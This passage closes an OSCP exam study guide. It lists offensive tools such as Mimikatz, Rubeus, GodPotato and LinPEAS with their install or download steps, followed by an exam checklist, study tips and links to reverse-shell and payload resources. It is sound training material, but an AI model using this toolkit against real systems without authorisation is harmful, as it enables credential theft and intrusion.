Ligolo-ng	`Download proxy + agent from GitHub releases`
LinPEAS/WinPEAS	`wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh`
BloodHound	`apt install bloodhound; pip3 install bloodhound`
Impacket	`apt install python3-impacket impacket-scripts`
CrackMapExec	`apt install crackmapexec`
Evil-WinRM	`gem install evil-winrm`
Kerbrute	`Download from GitHub releases`
Gobuster	`apt install gobuster`
ffuf	`apt install ffuf`
SecLists	`apt install seclists`
Rubeus	`Download pre-compiled from GitHub`
Mimikatz	`Download from gentilkiwi GitHub releases`
PrintSpoofer	`Download from itm4n GitHub`
GodPotato	`Download from BeichenDream GitHub`
PowerView	`Download from PowerSploit GitHub`
SharpHound	`Download from BloodHound GitHub`
Rlwrap	`apt install rlwrap`

PRE-EXAM CHECKLIST

✔ All tools downloaded and tested
✔ Transfer binaries ready (Linux + Windows versions of everything)
✔ Wordlists downloaded (rockyou.txt, SecLists)
✔ Kali VM snapshot taken (in case something breaks)
✔ VPN tested
✔ Report template ready
✔ Note-taking tool ready (Cherry Tree, Obsidian, or plain text files)
✔ Food and drinks prepared
✔ Webcam and screen sharing tested

24. MINDSET & FINAL TIPS

The OSCP Mindset

1.	Try Harder is real. When you're stuck, enumerate more. The answer is always in the enumeration. You probably missed something.
2.	Don't rabbit hole. If something isn't working after 30 minutes, move to something else. Come back with fresh eyes.
3.	Document everything. Write down what you tried and what you found. Future you will thank present you.
4.	Sleep before the exam. A rested brain solves problems 10x faster than a tired one. Don't pull an all-nighter before the exam.
5.	Practice under exam conditions. Set a timer, do 3 machines + 1 AD lab in 24 hours. No hints, no writeups.
6.	Read errors carefully. Error messages are your friend. They tell you exactly what went wrong.
7.	Check the simple things first. Default credentials, anonymous access, public exploits for known versions. Don't overthink it.
8.	Take breaks during the exam. Walk around, eat food, drink water. Your brain needs fuel and rest to perform.
9.	Failing is learning. Many people fail OSCP on the first attempt. It doesn't mean you're not good enough. It means you need more practice.
10.	Enumeration is 80% of hacking. If you enumerate well, exploitation becomes obvious. Don't skip steps.

Common Mistakes to Avoid

✘	Not scanning all 65535 ports (you miss services on high ports)
✘	Forgetting UDP scan (SNMP on UDP 161 is often the entry point)
✘	Not checking robots.txt, sitemap.xml, page source code
✘	Not trying default credentials on every login page
✘	Spending too long on one machine (set a timer!)
✘	Not reading exploit code before running it (it might need modifications)
✘	Forgetting to screenshot flags
✘	Bad report writing (no screenshots, missing steps, unclear explanation)
✘	Using Metasploit on the wrong machine (save it for the hardest one)
✘	Not practicing AD attacks enough (it's 40% of the exam!)

Useful Resources

GTFOBins	https://gtfobins.github.io/
LOLBAS (Windows)	https://lolbas-project.github.io/
RevShells	https://www.revshells.com/
HackTricks	https://book.hacktricks.xyz/
PayloadsAllTheThings	https://github.com/swisskyrepo/PayloadsAllTheThings
ExploitDB / SearchSploit	https://www.exploit-db.com/ and `searchsploit [query]`
CyberChef	https://gchq.github.io/CyberChef/
IppSec Videos	https://www.youtube.com/@ippsec (best HTB walkthrough videos)

YOU GOT THIS. TRY HARDER.

"The OSCP exam is not about being the smartest hacker in the room.
It's about being the most persistent, methodical, and well-prepared one."

"Enumerate. Enumerate. Enumerate. Then enumerate some more."

Reactions